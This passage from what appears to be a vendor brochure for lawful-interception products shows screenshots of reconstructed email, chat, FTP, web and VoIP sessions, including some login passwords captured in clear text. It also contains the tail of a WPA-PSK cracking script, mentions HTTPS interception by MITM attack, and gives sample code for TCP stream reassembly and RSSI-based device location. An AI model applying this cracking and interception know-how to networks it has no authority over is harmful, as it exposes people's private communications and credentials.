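if __name__ == "__main__":
    print(crack_wpa_psk(SAMPLE_HANDSHAKE, WORDLIST))
```

The PBKDF2 call is the whole cost: the PRF and the MIC are three or four cheap HMACs, so a GPU that parallelises the 4096-iteration derivation is what turns the "time left: 1 day" of a two-core CPU run into minutes, and nothing about the attack improves with more captured traffic. Only passphrase length and entropy, or an AKM that does not use PBKDF2 at all, change the outcome.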


Wireless-Detective - WPA-PSK Cracking Sol.

[Screenshot: Elcomsoft Wireless Security Auditor running a dictionary attack (english.dic) against the captured handshake for SSID "cuckoo": 2 CPU cores, 0 GPU cards; time elapsed 4 s, time left about 1 day 1 h; current speed 507, average speed 419; last password tried "0660"; processor load 100%; status "Running..."; log timestamps 10:22:35-10:22:36 March 07, 2010 ("english.dic has been opened successfully", "About to start new recovery: 2 CPU core(s), 0 GPU card(s)", "Recovery: started").]

This is an optional feature! An additional system is required! Please contact Decision Group for more information.


Reconstruction - Sample Email - POP3

[Screenshot: Wireless-Detective web UI (https://192.168.10.60/main.php) showing CATEGORY: POP3 - 192.168.1.11 (30 of 66 POP3 records; the left-hand menu groups records per client IP: 192.168.1.9 (9), 192.168.1.10 (11), 192.168.1.11 (30), 192.168.1.33 (14), 192.168.1.142). Columns: NO., DATE/TIME, FROM, TO, CC, SUBJECT, ACCOUNT, PASSWORD. Rows are 2008-07-02 messages to support@ed-system.sg (spam subjects and news mails such as "Brazil's new drunken driving law..." and "UN finds world economic insecurity..."), each with the POP3 login account (support@...) and its password (truncated in the screenshot) captured in clear. One record is opened as a reconstructed HTML page (appsrv/eml/1/index.html) with the Brazil drunk-driving article.]


Reconstruction - Sample Email - 


SMTP 


@ https//192.168.10.60/main.php - Windows Internet Explorer 


File Edit 
gly Favorites 


View 


| (Е hitps://192.168.10.60/main.php 


Favorites Tools Help 


t я EJ - 


“| de v Раде“ баѓеіу = Tools v ө- dí 


X 


P ~| 


a CATEGORY : SMTP - 192.168.1.11 


NO. 0 DATE / TIMEt FROM 


2008-07-02 
02:34:01 
2008-07-02 
02:30:51 
2008-07-02 
02:30:18 


Bl MENU 

+- POP3 (66) 
T3 SMTP (19) 
#1192 168.1.9 (2) 
8492 168.1.10 (5) 
8492 168.1.11 (3) 
#1192 168.1.33 (8 
#1192 168 (1) 
Ф IMAP (14) 


| 
| 
9 а WEBMAIL (READ) |= 


1. 8 


2. 9 


[E-e 


IK 1 


decision@ed-... 
decision@ed-. 


decision@ed-... 


TO cc 


decision@ed-...  support@... 
decision@ed-... NONE 
support@ed-s... NONE 


Count: 3, Total : 1,1 


BCC 


NONE 


NONE 


NONE 


(tà \\МЕВ E 28216800 ррзгу/ет\ 


=g 


4/index.html - Windows Internet Explorer _ 


Ф hittps://192.168.10.60/appsrv/eml/4/index.htm! 


|| Elle Edit Мем Favorites Tools Help 
+) SE 
са ( 


Ч d v Раде“ Safety» Тооб“ ФУ 


oly Favorites 
#59 YAHQ 
aA 20 ( 
Поти 
H- КУР 
#- $76006 
«|с (2 


ЕЕЕ: 
| 


DATETIME 2008-0720 


Ex-con suspected of killing 8 captured | 
GRANITE CITY (Illinois) - AUTHORITIES say they have captured an ex-convict 


Lieutenant Bill Baker of the St Louis Area Major Case Squad says twenty-eight-ye 
about 16 kilometers north of St Louis, Missouri. He did not immediately have morejl 


А spokeswoman with the Granite City police department says Sheley is in custody 


couple whose blood-soaked dogs were found roaming a motel parking lot. 


year-old died from blunt force trauma to the head. 


Officials said the other victims all appeared to have died in the same manner. 


= City, Illinois 


@ temet | Protected Mode: Of „+ җи + 


The FBI launched a manhunt for Sheley, who they believe is tied to the killings of eight people in Illinois and Missouri, including a 93-year-old man, a child, апда 


Police in Galesburg. in northwestern Illinois, had ealier said that they had a warrant for Sheley?s arrest on charges including first-degree murder, aggravated 
battery and vehicular hijacking in the death of Mr Ronald Randall, whose body was found Monday behind a Galesburg grocery store. An autopsy shows the 65- 


ПП 


4 


Done 


@ Internet | Protected Mode: Off fg v %100% + 
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+ New York 


+ Captured 


SUBJECT 


ge 1 | Rows per page: 


SIZE 


93.5K 


TT.9K 


97.3K 


20 [ Submit | 


otected Mode: Off 


v 
Reconstruction - Sample Email - IMAP

[Screenshot: CATEGORY: IMAP - 192.168.1.10 (14 IMAP records), same columns as the POP3 view including ACCOUNT and PASSWORD; 2008-07-02 messages to support@ed-system.sg, one opened as a reconstructed page (appsrv/eml/1/index.html) with the Brazil drunk-driving article.]


Reconstruction - Sample Web Mail

[Screenshot: E-Detective web UI (https://192.168.1.60/main.php). Left-hand menu with category counts: POP3 (15), SMTP (2), IMAP (0), WEBMAIL (READ), WEBMAIL (SENT), MSN (11), ICQ (0), YAHOO (5), QQ (0), UT (0), SKYPE (0), FTP (8), P2P (2), GAME (0), HTTP (LINK) (1500), HTTP (CONTENT), HTTP (DOWNLOAD), HTTP (RECONSTR...), TELNET (3), SEARCH, ALERT, EXPORT, MANAGE. The WEBMAIL (READ) list for IP 192.168.1.103, 2008-03-02 13:43-13:52, shows records from Windows Live, YAHOO2.0 Mail, YAHOO Mail and GMail, each with a "Please open record file" link. One GMail record is opened as a reconstructed page:

FROM : bobierbonier@gmail.com
DATE / TIME : 2008-03-02 13:47:08
TO : wedetective1@yahoo.com
CC : wedetective2@yahoo.com
SUBJECT : U.N. chief condemns Israel after bloody day in Gaza
Body: a Reuters article by Nidal al-Mughrabi, with its inline photo.]


Reconstruction - Sample Web Mail

[Screenshot: E-Detective web GUI at https://192.168.10.60/main.php. The left pane is the protocol category tree, each node with its record count and, beneath it, the client IPs seen (192.168.1.9, 192.168.1.10, 192.168.1.11, 192.168.88.1, ...): POP3 (66), SMTP (19), IMAP (14), WEBMAIL (READ), WEBMAIL (SENT), ICQ (7), YAHOO (22), QQ (10), UT (1), SKYPE (3), GOOGLETALK (1), IRC (2), FTP (22), P2P (13), GAME (3), HTTP (LINK) (1322), HTTP (CONTENT), HTTP (DOWNLOAD), HTTP (RECONSTRUCT), VIDEO STREAM (35), TELNET (44), followed by SEARCH, ALERT, EXPORT, MANAGE, REGISTER, UPGRADE and LOGOUT. The WEBMAIL (SENT) list shows DATE/TIME, sender, receiver and CC (NONE) per record, e.g. 2008-07-02 02:28:17 frankie.deci... to decision@ed-..., 02:27:24 frankie.deci... to support@ed-s..., 02:25:28 wedetective2... to support@ed-s..., 02:24:57 wedetective2 to frankie.deci... The opened record (https://192.168.10.60/http/openweb.php?TYPE=3&..., shown with a browser certificate error because the appliance serves its GUI under a self-signed certificate):]

WEBMAIL (SENT) | IP: 192.168.1.11 | DATE / TIME: 2008-07-02 02:27:24
FROM: frankie.decision@gmail.com
DATE / TIME: 2008-07-02 02:27:24
TO: support@ed-system.sg
SUBJECT: ... economic insecurity among rich, poor
ATTACHMENT: ....jpg
(followed by the mailed news article on the UN report that rich and poor nations share an economic insecurity driven by trade shocks from oil and food prices, financial markets, natural disasters and armed conflicts)
[Screenshot: instant-messenger reconstruction. The MSN conversation list (columns DATE/TIME, PARTICIPANTS, CONVERSATION COUNTS) shows 2008-07-02 02:43:23, wedetective2@hotmail.com / wedetective@hotmail.com, 9 messages, and 2008-06-02 11:27:18, same participants, 10 messages. The opened conversation lists NO., DATE/TIME, SCREEN NAME, FILE NAME, SIZE, TYPE (MSN) and MESSAGE, in order: "helo", "how r u?", ..., "thank you", "alright", "okie", "thank you", "welcome", "kk", "bye". A second window, opened from https://192.168.1.60/yahoo/yahoo_msg.php?IDX=3&DATE=2006-10-21 03:17:39&OWNER=tom-0102&WHOM=math_824&IP=192.168.1.17, shows a YAHOO messenger session for IP 192.168.1.17 between screen names tom-0102 and math_824, each entry with DATE/TIME, SCREEN NAME, TYPE (MESSAGE), START TIME and END TIME (03:17:22 to 03:29:24 on 2006-10-21), 8 entries in total.]

Including text chat messages, file transfer, VoIP and webcam sessions reconstruction and playback.
Supports client and web Yahoo.


Reconstruction - Sample File Transfer - FTP

[Screenshot: FTP category (22 records) at https://192.168.10.60/main.php, with the management part of the tree visible on the left: SEARCH, ALERT, EXPORT, MANAGE, WIRELESS, BACKUP, SYSTEM, NETWORK USE..., AUTHORITY SE..., DELETE DATA, EDIT PASSWORD. The list columns are NO., DATE/TIME, ACCOUNT, PASSWORD, ACTION, FTP SERVER, FILE NAME; it holds four downloads on 2008-07-02, all with account "anonymous" and password "IEUser@", from FTP server 64.7.210.151, of D-Link datasheets: DWA-642_ds.pdf, DSM-320..._ds.pdf, DWA-140_ds.pdf, DWA-643... (Count: 4, Total: 1, In page 1 | Rows per page: 8). Clicking a file name offers the reconstructed file itself (File Download dialog: FTP_AASdSk.pdf, Adobe PDF, 594 KB, from 192.168.10.60); the preview is the D-Link RangeBooster N adapter datasheet (Wi-Fi Protected Access WPA/WPA2 under Security, FCC Class B under Certifications).]

The ACCOUNT and PASSWORD columns are filled in because FTP sends the login in clear text; the same holds for the POP3, IMAP, SMTP and TELNET categories in the tree whenever those protocols run without TLS.


Reconstruction - Sample Peer to Peer - P2P

[Screenshot: P2P category (13 records, client IPs 192.168.1.10, .11, .33, .142) at https://192.168.10.60/main.php. Columns: No., DATE/TIME, TOOL, FILENAME, Last Activated, Throughput, Throughput, Detail:]

1. 2008-09-22 01:58:41  Foxy 1.9.8.0     Give Me 5 - ...                  2008-09-22 01:55:10  0B     1.2M    Detail
2. 2008-09-22 01:56:04  Foxy 1.9.8.0     ... EX 2...                      2008-09-22 02:02:18  4.6M   0B      Detail
3. 2008-09-22 01:55:18  Foxy 1.9.8.0     Give Me 5 - ...                  2008-09-22 01:55:10  0B     604.6K  Detail
4. 2008-03-29 07:08:54  LimeWire/4.16.6  Adobe ... 3.0 Converter ...      2008-03-29 07:09:04  0B     20.8K   Detail
5. 2008-03-29 07:08:03  LimeWire/4.16.6  Top of Charts - 2005.wma         2008-03-29 07:09:04  0B     186.7K  Detail
(Count: 5, Total: 1, In page 1)

The Detail view (P2P | 192.168.1.10, hash ...LFN&Q7GHOSN2GNBGX35YB5HEOQ6Z) lists No., DATE/TIME, ACTION, P2P IP, PORT, P-PORT, Throughput:

1. 2008-03-29 07:08:03  DOWNLOAD  97.96.149.28    57962  9887   2.7K
2. 2008-03-29 07:09:01  DOWNLOAD  96.242.169.106  57967  24653  40.0K
3. 2008-03-29 07:09:04  DOWNLOAD  98.210.122.244  57963  19419  44.1K
4. 2008-03-29 07:09:04  DOWNLOAD  68.151.212.254  57956  32106  16.0K
5. 2008-03-29 07:09:04  DOWNLOAD  70.53.66.69     57964  28488  28.1K
6. 2008-03-29 07:09:04  DOWNLOAD  64.233.237.87   57960  25873  22.8K
7. 2008-03-29 07:09:04  DOWNLOAD  65.92.159.214   57954  50663  27.4K
8. 2008-03-29 07:09:04  DOWNLOAD  70.44.65.175    57958  17273  5.5K
(Count: 8, Total: 1, In page 1 | Rows per page: 20)

Including Action (Download/Upload), Peer IP, Port, Peer Port & Throughput.


Reconstruction - Sample HTTP -

[Screenshot: CATEGORY: HTTP (RECONSTRUCT) at https://192.168.10.60/main.php, HTTP Content list with client IPs 192.168.1.9 (49), .10 (174), .11 (99), .13 (49), .33 (180), .142. Each row is a Date-Time and the page URL, e.g. 2008-07-02 02:44:18 http://kaw.t.msn.com/en-sg/home.aspx; 02:43:00 http://sg.insider.msg.yahoo.com/client_ad.php; 02:38:48 http://digg.com/tools/diggthis...; 02:38:34 http://isohunt.com/torrents/...; 02:37:42 to 02:34:48 further digg.com, isohunt.com and http://www.dlink.com/prod... pages (5 pages of results). The opened record (IP 192.168.1.11, 2008-07-02 02:37:42, served from https://192.168.10.60/http/http_reconstruct.php...) is the isoHunt front page rebuilt from the captured HTTP content, "Page 1 of 40 (199 items)", with the posts "SSL now available for citizens of Dubai (and others)!" (Posted by SecretSquirrel on Jun. 25: "YOU CAN NOW SEARCH SECURELY WITH ISOHUNT.COM ... A connection via ssl allows you to communicate with us privately, bypassing caching servers and deep packet inspection hardware"; https://isohunt.com, https://torrentbox.com and https://forums.torrentbox.com now valid; ads and digg not on SSL may cause warnings; 20 comments) and "Firefox 3 released!" (Posted by SecretSquirrel on Jun. 17).]

The reconstructed page itself states the limit of this passive mode: once the same site is browsed under https://, the content is no longer readable from a mirror port, which is why HTTPS is covered only by the separate active MITM mode of the NIT system described later in this document.


Reconstruction - Sample HTTP - Upload/Download

[Screenshot: HTTP (DOWNLOAD) category at https://192.168.1.60/main.php; the tree also shows HTTP (LINK) (1500) and HTTP (CONTENT) with per-client counts for 192.168.0.152, 192.168.1.103, .17, .237, .47, .51, .53. Columns: No., Date/Time, Action, File Name, URL, Size:]

31. 2008-03-02 14:23:28  Download  mirc631.exe     http://software-files.download.com/sd/...              60.3K
32. 2008-03-02 14:16:32  Download  links.txt       http://diy.stomp.com.sg/links.txt                      275B
33. 2008-03-02 13:51:38  Download  receiveim.mp3   http://mail.yimg.com/us.yimg.com/i/us/pim/receiveim.mp3  82K
34. 2008-03-02 13:42:50  Upload    demo_3.JPG      http://mail.google.com/mail/?ui=1&ik=...&cmid=48       50.0K
35. 2008-03-02 13:36:22  Download  0103HLW002.pdf  http://www.todayonline.com/pdflive/0103HLW002.pdf      111.3K
36. 2008-03-02 13:36:14  Download  0103HLW001.pdf  http://www.todayonline.com/pdflive/0103HLW001.pdf      89.8K
37. 2008-03-02 13:35:44  Download  newtickers.txt  ...                                                    481B
38. 2008-03-02 13:35:34  Download  newtickers.txt  ...                                                    481B
(4 pages of results; Rows per page: 10)

The opened record is the downloaded newspaper PDF page ("My hospital bill c
ost me only ...", a TODAY article on MediSave, MediShield and MediFund), rendered in the browser exactly as the user received it.


Reconstruction - Sample HTTP - Video Streaming

[Screenshot: VIDEO STREAM category (35 records; clients 192.168.1.9 (6), 192.168.1.142) at https://192.168.10.60/main.php. Every clip appears twice with the same size: once for the YouTube watch page and once for the CDN host 203.66.48.x that actually served the FLV. Columns: No., Date/Time, Host, Title, URL, Size:]

1.  2008-09-22 02:14:32  youtube.com     WotLK: Possibly ab...   http://tw.youtube.com/watch?v=y17Zu...   1,011.3K
2.  2008-09-22 02:14:32  203.66.48.35    HTTPVIDEO_SNFANr.f...   http://203.66.48.35/youtube/2/y17Zu...   1,011.3K
3.  2008-09-22 02:06:06  youtube.com     Gnomish engineer ...    http://tw.youtube.com/watch?v=Go2Fq...   695.0K
4.  2008-09-22 02:06:06  203.66.48.101                           http://203.66.48.101/youtube/4/Go2F...   695.0K
5.  2008-09-22 01:48:54  youtube.com                             http://tw.youtube.com/watch?v=X3_VP...   2.6M
6.  2008-09-22 01:48:54  203.66.48.36                            http://203.66.48.36/youtube/1/X3_VP...   2.6M
7.  2008-09-22 01:46:53  youtube.com                                                                      2.4M
8.  2008-09-22 01:46:53  203.66.48.36                                                                     2.4M
...
19. 2008-09-22 01:43:37  youtube.com                             ...E3StF...                              970.4K
20. 2008-09-22 01:43:37  203.66.48.38    HTTPVIDEO_YLhncH.f...   http://203.66.48.38/youtube/2/E3StF...   970.4K
(Count: 22, Total: 2, In page 1 | Rows per page: 20)

The reconstructed clip is played inside the GUI's Flash player (https://192.168.10.60/http/player.swf?file=/datas/20...).
Play back reconstructed FLV video file.


Reconstruction - VoIP SIP/H.323 RTP Voice Calls

[Screenshot: CATEGORY: VOIP. The tree gives this capture's counts: SKYPE (0), GOOGLETALK (0), IRC (0), FTP (6), P2P (1), GAME (0), HTTP (LINK) (41), HTTP (CONTENT) (36), HTTP (DOWNLOAD) (11), HTTP (RECONSTRUCT), VIDEO STREAM (1), TELNET (0), INCOMPLETE (1747). Columns: NO., Date-Time, Caller, Callee, Mode, Type, Codec, File Name, Time. Six calls, all dated 2009-12-13 12:01:55, between callers 8610044407 / 8610044420 and callees 8610000104 / 8610044421, every one Mode "peer to peer" and Type SIP, codecs G723, G723, iLBC and G729, each saved as a WAV file (VOIP_SeA5je.wav, VOIP_DNSNJw.wav, VOIP_kljWaP.wav, VOIP_GAWJF7.wav, VOIP_BGu6dq.wav, VOIP_6Sa3Tl.wav) with durations 8 sec, 8 sec, 58 sec, 50 sec, 1 min 3 sec and 1 min 2 sec. The selected call, 8610044420_8610044421, is playing in Windows Media Player.]


Reconstruction - Sample Incomplete Sessions

An incomplete session is a TCP stream the capture did not see from start to finish (it was opened before the capture began, was still open when it stopped, or lost segments on the way), so no application-level record can be built for it; the bytes that were captured are kept as a raw .dat file that can still be inspected by hand.

[Screenshot: CATEGORY: INCOMPLETE - 192.168.0.100 (INCOMPLETE (1747) in the tree, 12 of them for this client). Columns: No., Date/Time, BSSID, Source, Destination, File, Size, Type, Comment:]

1. 2007-10-13 07:39:19  00:11:95:55:F6:F1  192.168.0.100:3115  222.139.143.73:80   INCOMPLETE_....dat     3.0K  HTTP  HTTP Header
2. 2007-10-13 ...       00:11:95:55:F6:F1  192.168.0.100:3492  60.28.26.251:80     INCOMPLETE_twuXqJ.dat  5.7K  HTTP  HTTP Header
3. 2007-10-13 ...       00:11:95:55:F6:F1  192.168.0.100:2494  202.157.142.198:80  INCOMPLETE_OinOKD.dat  8.4K  HTTP  HTTP Header
4. 2007-10-13 07:32:57  00:11:95:55:F6:F1  192.168.0.100:2416  222.134....73:80    INCOMPLETE_NXrudP.dat  618   HTTP  HTTP Header
5. 2007-10-13 ...       00:11:95:55:F6:F1  192.168.0.1...
...
   2007-10-13 07:41:43  00:11:95:55:F6:F1  192.168.0.100:1660  203.1...

Opening INCOMPLETE_OinOKD.dat (File Download dialog: Application, 8.41 KB) in WordPad shows the raw client-side bytes, here the HTTP request headers of two requests on one keep-alive connection:

GET /images/FX30MBX.jpg HTTP/1.1
Accept: */*
Referer: http://www.ed-system.sg/
...
Accept-Encoding: gzip, deflate
If-Modified-Since: Sun, 04 Feb 2007 15:20:08 GMT
If-None-Match: "168024-6620-1cb3ba00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ...; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.ed-system.sg
Connection: Keep-Alive

GET /www.ed-system.sg/ED%20small.JPG HTTP/1.1
Accept: */*
Referer: ...
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 23 Jun 2007 18:53:14 GMT
If-None-Match: "..."
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ...; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: www.ed-system.sg
Connection: Keep-Alive
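Every reconstruction sample in this series, from the webmail record to the incomplete-session .dat file, rests on the same first step: group captured frames into TCP flows, put the segments back in sequence order, and only then hand the byte stream to a protocol decoder; a flow that never closed, or that has a hole in it, is what ends up in the INCOMPLETE category. The following example, written for this page and not E-Detective or NIT code, does that step for HTTP requests over raw Ethernet frames. The frames are constructed inline (assumed MACs, IP addresses, ports and sequence numbers), one request arriving out of order with a retransmission and never closed, one closed with a FIN, and the output is shaped like the INCOMPLETE view above.

```python
"""Reassemble client-to-server TCP streams from raw Ethernet frames, pull the
HTTP request line and headers out of each, and flag a session that never saw a
FIN (or has a hole) as INCOMPLETE. Added example for this page, not E-Detective
or NIT code; every frame below is constructed in sample_frames() (assumed MACs,
IPs and sequence numbers), so nothing is read from a pcap."""
import struct
from collections import defaultdict

ETH_P_IP = 0x0800
TCP_FIN, TCP_SYN, TCP_ACK = 0x01, 0x02, 0x10


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq, flags, payload=b""):
    """Minimal Ethernet/IPv4/TCP frame: no options, checksums left zero."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    return mac(dst_mac) + mac(src_mac) + struct.pack("!H", ETH_P_IP) + ip + tcp


def parse_frame(frame):
    """(src_mac, src_ip, sport, dst_ip, dport, seq, flags, payload), or None if not IPv4/TCP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_IP or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4                       # IPv4 header length
    total = struct.unpack("!H", frame[16:18])[0]       # IPv4 total length
    tcp = frame[14 + ihl:14 + total]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    doff, flags = (tcp[12] >> 4) * 4, tcp[13]
    src_mac = ":".join(f"{b:02x}" for b in frame[6:12])
    return (src_mac, ".".join(map(str, frame[26:30])), sport,
            ".".join(map(str, frame[30:34])), dport, seq, flags, tcp[doff:])


def reassemble(frames):
    """Per flow, order segments by sequence number (retransmits overwrite, overlaps
    are trimmed, a hole stops reassembly) and note whether a FIN was seen."""
    flows = defaultdict(lambda: {"mac": None, "seg": {}, "fin": False})
    for frame in frames:
        p = parse_frame(frame)
        if p is None:
            continue
        src_mac, src_ip, sport, dst_ip, dport, seq, flags, payload = p
        f = flows[(src_ip, sport, dst_ip, dport)]
        f["mac"] = src_mac
        if payload:
            f["seg"][seq] = payload
        if flags & TCP_FIN:
            f["fin"] = True
    streams = {}
    for key, f in flows.items():
        data, nxt, hole = b"", None, False
        for seq in sorted(f["seg"]):
            chunk = f["seg"][seq]
            if nxt is not None and seq > nxt:          # missing segment: stop here
                hole = True
                break
            if nxt is not None and seq < nxt:          # overlap: drop the repeated prefix
                chunk = chunk[nxt - seq:]
            data += chunk
            nxt = seq + len(f["seg"][seq])
        streams[key] = {"mac": f["mac"], "data": data, "complete": f["fin"] and not hole}
    return streams


def http_request(data):
    """(method, path, headers) of the first request in a client stream."""
    head = data.partition(b"\r\n\r\n")[0].decode("latin-1").split("\r\n")
    method, path = head[0].split(" ")[:2]
    headers = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in head[1:])}
    return method, path, headers


def session_table(frames):
    """Rows shaped like the INCOMPLETE view: MAC, source, destination, status, request."""
    rows = []
    for (sip, sp, dip, dp), s in sorted(reassemble(frames).items()):
        method, path, hdr = http_request(s["data"])
        rows.append({"mac": s["mac"], "source": f"{sip}:{sp}", "destination": f"{dip}:{dp}",
                     "status": "COMPLETE" if s["complete"] else "INCOMPLETE",
                     "request": f"{method} {hdr.get('host', '?')}{path}"})
    return rows


# Constructed sample capture (assumed addresses): request A is split over two
# segments that arrive out of order, one of them retransmitted, and the session
# is still open when capture stops; request B is closed with a FIN.
CLIENT_MAC, SERVER_MAC = "00:11:95:55:f6:f1", "00:50:7f:29:58:11"
REQ_A = (b"GET /images/FX30MBX.jpg HTTP/1.1\r\nAccept: */*\r\n"
         b"Referer: http://www.ed-system.sg/\r\nHost: www.ed-system.sg\r\nConnection: Keep-Alive\r\n\r\n")
REQ_B = b"GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n"


def sample_frames():
    def seg(sport, dip, seq, flags, payload=b""):
        return build_frame(CLIENT_MAC, SERVER_MAC, "192.168.0.100", dip, sport, 80, seq, flags, payload)
    a1, a2 = REQ_A[:40], REQ_A[40:]
    return [seg(3115, "222.139.143.73", 1001 + len(a1), TCP_ACK, a2),   # second half first
            seg(3115, "222.139.143.73", 1001, TCP_ACK, a1),
            seg(3115, "222.139.143.73", 1001, TCP_ACK, a1),             # retransmission
            seg(3492, "60.28.26.251", 5001, TCP_ACK, REQ_B),
            seg(3492, "60.28.26.251", 5001 + len(REQ_B), TCP_FIN | TCP_ACK)]


if __name__ == "__main__":
    for row in session_table(sample_frames()):
        print(row)
```

Run stand-alone it prints one row per flow; the first is INCOMPLETE because no FIN was ever seen, although its bytes reassemble cleanly, which is exactly the state of the .dat files above: readable headers, no record. A product decoder adds the server side of each flow and per-protocol parsers on top of this, but the ordering and hole-detection logic does not change.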


Data Search - Conditions & Free Text Search

[Screenshot: https://192.168.10.60/search/search_list.php. The same parameter form serves Search and ALERT PARAMETERS: DATE (from ~ to), TIME, IP (ALL), BSSID, MAC, EMAIL (FROM / TO / CC / BCC), SUBJECT, WEBMAIL TYPE, SERVER IP, ACCOUNT, P2P TOOL, P2P FILE, GAME NAME, MSN ACCOUNT, SCREEN NAME / PARTICIPANTS, plus a free-text Search box.]


Location Estimation - Wireless ...ment Locator

Utilizes wireless sensors and a triangulation calculation/training methodology to estimate the location of the targeted wireless devices (AP or STA).

[Screenshot: left, the Wireless Client List (TYPE, MAC address per device); right, the Wireless Network Topology plan with the sensor positions, a GPS reading and the status "Training process completed". Select the targeted wireless device to show its estimated location; the display marks the targeted device's estimated location on the plan.]

Allows finding the approximate location of the targeted wireless device in the X-Y plane. The estimation error depends on the surrounding environment (e.g. blockage), normally a few metres.
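The slide names the two ingredients, a training pass and a triangulation calculation, without showing either. The following example, added here and not the product's own (undisclosed) algorithm, shows one standard way they fit together: a log-distance path-loss model is fitted from RSSI readings taken at known distances (the training), each sensor's RSSI for the target is converted to a distance, and the position is the least-squares solution of the trilateration equations. Sensor positions, calibration points and the "measured" RSSI values are constructed; the path-loss model itself is the assumption that makes the method work, and the few-metre error the slide quotes comes from how far real indoor propagation departs from it.

```python
"""Estimating a Wi-Fi device's position in the X-Y plane from the signal
strength that several fixed sensors report for it. A short training pass at
known distances fits a log-distance path-loss model (reference RSSI at 1 m and
exponent n); each sensor's RSSI is then converted to a distance and the
position is the least-squares solution of the trilateration equations. Added
example for this page, not the product's algorithm (which it does not
disclose); sensor positions, calibration points and the 'measured' RSSI values
are constructed, and the path-loss model is the assumption that makes it work."""
import math

SENSORS = [(0.0, 0.0), (10.0, 0.0), (0.0, 10.0), (10.0, 10.0)]   # metres, constructed
# Training samples (distance in m, RSSI in dBm) generated from RSSI(1 m) = -40, n = 2.5.
CALIBRATION = [(d, -40 - 25 * math.log10(d)) for d in (1.0, 2.0, 4.0, 8.0)]


def train_path_loss(calibration):
    """Least-squares fit of RSSI = RSSI_1m - 10 n log10(d); returns (RSSI_1m, n)."""
    xs = [math.log10(d) for d, _ in calibration]
    ys = [r for _, r in calibration]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / sum((x - mx) ** 2 for x in xs)
    return my - slope * mx, -slope / 10


def rssi_to_distance(rssi, rssi_1m, n):
    """Invert the path-loss model: d = 10 ** ((RSSI_1m - RSSI) / (10 n))."""
    return 10 ** ((rssi_1m - rssi) / (10 * n))


def trilaterate(sensors, distances):
    """Least-squares (x, y) from >= 3 sensors. Subtracting the first circle
    equation from the others gives a linear system 2(xi-x0)x + 2(yi-y0)y = bi."""
    (x0, y0), d0 = sensors[0], distances[0]
    rows, rhs = [], []
    for (xi, yi), di in zip(sensors[1:], distances[1:]):
        rows.append((2 * (xi - x0), 2 * (yi - y0)))
        rhs.append(d0 ** 2 - di ** 2 + xi ** 2 - x0 ** 2 + yi ** 2 - y0 ** 2)
    a11 = sum(r[0] * r[0] for r in rows)
    a12 = sum(r[0] * r[1] for r in rows)
    a22 = sum(r[1] * r[1] for r in rows)
    b1 = sum(r[0] * v for r, v in zip(rows, rhs))
    b2 = sum(r[1] * v for r, v in zip(rows, rhs))
    det = a11 * a22 - a12 * a12            # normal equations (A^T A) p = A^T b
    if abs(det) < 1e-9:
        raise ValueError("sensors are collinear; place one off the line")
    return (a22 * b1 - a12 * b2) / det, (a11 * b2 - a12 * b1) / det


def locate(sensors, rssis, rssi_1m, n):
    """Position estimate from one RSSI reading per sensor."""
    return trilaterate(sensors, [rssi_to_distance(r, rssi_1m, n) for r in rssis])


def simulated_rssi(target, sensors, rssi_1m, n, noise_db):
    """Constructed readings: model RSSI at each sensor plus a per-sensor error in dB."""
    return [rssi_1m - 10 * n * math.log10(math.dist(target, s)) + e
            for s, e in zip(sensors, noise_db)]


if __name__ == "__main__":
    rssi_1m, n = train_path_loss(CALIBRATION)
    readings = simulated_rssi((3.0, 7.0), SENSORS, rssi_1m, n, [1.0, -1.0, 0.5, -0.5])
    x, y = locate(SENSORS, readings, rssi_1m, n)
    print(f"estimate ({x:.1f}, {y:.1f}) m, true (3.0, 7.0), error {math.hypot(x - 3, y - 7):.1f} m")
```

With exact readings the solver returns the true position; with a 1 dB error on two sensors and 0.5 dB on the other two it lands about a metre off, because at n = 2.5 every decibel moves the inferred distance by roughly 10 percent. That sensitivity is why a fresh training pass per site matters more than the solver, and why a fourth sensor (an over-determined system) is worth having.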




Integrated Wireline & Wi-Fi/WLAN Real-Time Interception & Reconstruction System
Network Investigation Toolkit (NIT)


Introduction to Network Investigation Toolkit (NIT)

What are the capabilities of NIT?
* Intercepts Ethernet LAN traffic through a mirror/SPAN port (or by using a network tap).
* Intercepts WLAN traffic (up to 4 different WLAN channels) through USB Wi-Fi adapters. [Photo: Lenovo ThinkPad X200 with USB Wi-Fi adapters attached]
* Intercepts Ethernet LAN based HTTPS/SSL traffic by MITM attack.
* Intercepts WLAN based HTTPS/SSL traffic by MITM attack.
* Real-time raw data decoding and reconstruction.
* Offline raw data manual reconstruction.

Solution for: Law Enforcement Agencies (Police Intelligence, Military Intelligence, National Security, Counter Terrorism, Cyber Security, Defense Ministry, Secret ...)


NIT Implementation Mode - LAN Passive Interception

NIT System Mode of Operation: Ethernet LAN Passive Interception (Passive SPAN Mode)

Capture - Sniffer Mode: mirror-sniffer technology is used for capturing Internet traffic/packets through a port-mirroring switch.

[Diagram: Internet - Router/Firewall - Switch/Hub. The switch's uplink port is mirrored to the NIT system, which is managed by the investigator; the server farm, the network users and another building/department/floor all hang off the same switch, so everything that crosses the uplink is seen.]

A mirror port only carries what the switch copies to it, and it is oversubscribed as soon as the mirrored traffic exceeds the port's own line rate, so the lost- and dropped-packet counters on the NIT status page should be watched during a capture; a network tap does not have this limit.


NIT Implementation Mode - LAN HTTPS Interception

